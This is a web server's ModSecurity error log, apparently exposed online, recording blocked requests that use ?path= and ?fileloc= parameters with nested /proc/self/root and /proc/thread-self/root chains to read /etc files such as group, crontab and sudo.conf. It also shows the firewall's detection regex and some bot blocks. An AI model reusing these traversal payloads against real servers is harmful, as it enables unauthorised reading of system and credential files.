https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 04:16:28.788098 2026] [:error] [pid 31803:tid 140411590858496] [client 74.7.241.31:52084] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpRTOyqAr6etmhZHNp8XQAAAFI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 04:16:44.063133 2026] [:error] [pid 19507:tid 140411641214720] [client 216.73.216.191:39396] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/bashrc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpRXNY0UrI5A3LftIxV4gAAAYw"]
[Wed Mar 18 04:16:55.047202 2026] [:error] [pid 29882:tid 140411557287680] [client 74.7.241.31:51016] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpRZ0zinOy1jxa1j4fVmQAAARY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 04:16:59.973879 2026] [:error] [pid 26799:tid 140411741927168] [client 216.73.216.191:40038] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpRa9a6ubjKNq_cu4ZZoQAAA0A"]
[Wed Mar 18 04:17:00.561338 2026] [:error] [pid 31803:tid 140411658000128] [client 74.7.243.128:38008] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpRbOyqAr6etmhZHNp8fwAAAEo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/run/initramfs/state/etc
[Wed Mar 18 04:17:05.546400 2026] [:error] [pid 31803:tid 140411590858496] [client 74.7.243.128:54924] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpRceyqAr6etmhZHNp8hQAAAFI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 04:17:06.003541 2026] [:error] [pid 29882:tid 140411590858496] [client 74.7.244.43:49612] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abpRckzinOy1jxa1j4fVogAAARI"]
[Wed Mar 18 04:17:08.327858 2026] [:error] [pid 17653:tid 140411565680384] [client 74.7.228.61:56190] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abpRdMdf6f5d65gmYZSUBgAAAtU"]
[Wed Mar 18 04:17:11.900842 2026] [:error] [pid 29882:tid 140411616036608] [client 216.73.216.191:12781] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/yum.conf.bkp-21-10-22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpRdkzinOy1jxa1j4fVqQAAAQ8"]
[Wed Mar 18 04:17:14.665699 2026] [:error] [pid 29882:tid 140411733534464] [client 216.73.216.191:40770] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/vimrc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpRekzinOy1jxa1j4fVsAAAAQE"]
[Wed Mar 18 04:17:16.266322 2026] [:error] [pid 15051:tid 140411674785536] [client 74.7.241.31:52040] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpRfCmAPhZkrhU8w4kw0gAAAIg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 04:17:18.539103 2026] [:error] [pid 15826:tid 140411616036608] [client 216.73.216.191:40944] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpRfeoXxyEfFpUF8f8wVgAAAU8"]
[Wed Mar 18 04:17:21.144335 2026] [:error] [pid 17653:tid 140411599251200] [client 216.73.216.191:41104] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpRgcdf6f5d65gmYZSUFAAAAtE"]
[Wed Mar 18 04:17:22.584574 2026] [:error] [pid 17887:tid 140411683178240] [client 74.7.241.31:54948] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpRggkwaGbbGflqUZDVpgAAAMc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 04:17:22.878405 2026] [:error] [pid 29882:tid 140411683178240] [client 216.73.216.191:41224] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/rpc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpRgkzinOy1jxa1j4fVuwAAAQc"]
[Wed Mar 18 04:17:23.569155 2026] [:error] [pid 30077:tid 140411691570944] [client 216.73.216.191:41264] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/sysctl.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpRg_u8EFLIOrSqIpvJagAAAkY"]
[Wed Mar 18 04:17:40.774962 2026] [:error] [pid 15051:tid 140411641214720] [client 74.7.243.128:54940] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/var/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpRlCmAPhZkrhU8w4kw-wAAAIw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/var/run/initramfs/state/etc
[Wed Mar 18 04:17:50.775589 2026] [:error] [pid 17887:tid 140411599251200] [client 74.7.243.128:39024] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpRngkwaGbbGflqUZDVvAAAANE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 04:18:06.339388 2026] [:error] [pid 15051:tid 140411649607424] [client 74.7.241.31:54950] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpRrimAPhZkrhU8w4kxEwAAAIs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 04:18:19.868782 2026] [:error] [pid 29882:tid 140411590858496] [client 74.7.243.128:58698] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpRu0zinOy1jxa1j4fV2wAAARI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 04:18:24.781843 2026] [:error] [pid 15051:tid 140411691570944] [client 216.73.216.191:42496] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/uwsgi.ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpRwCmAPhZkrhU8w4kxGAAAAIY"]
[Wed Mar 18 04:18:28.143667 2026] [:error] [pid 15051:tid 140411658000128] [client 216.73.216.191:42726] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/issue"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpRxCmAPhZkrhU8w4kxHAAAAIo"]
[Wed Mar 18 04:18:29.065878 2026] [:error] [pid 17887:tid 140411565680384] [client 216.73.216.191:42776] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/crontab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpRxQkwaGbbGflqUZDV0AAAANU"]
[Wed Mar 18 04:18:29.855917 2026] [:error] [pid 17887:tid 140411548894976] [client 216.73.216.191:42826] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/magic"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpRxQkwaGbbGflqUZDV0gAAANc"]
[Wed Mar 18 04:18:36.444731 2026] [:error] [pid 30077:tid 140411649607424] [client 216.73.216.191:43068] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/sudo.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpRy_u8EFLIOrSqIpvJgwAAAks"]
[Wed Mar 18 04:18:38.039824 2026] [:error] [pid 11816:tid 140411741927168] [client 74.7.241.31:52452] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpRzuw_le52K8_3pV2i-wAAAgA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 04:18:41.208147 2026] [:error] [pid 19507:tid 140411632822016] [client 216.73.216.191:43302] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/system-release-cpe"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpR0dY0UrI5A3LftIxWPQAAAY0"]
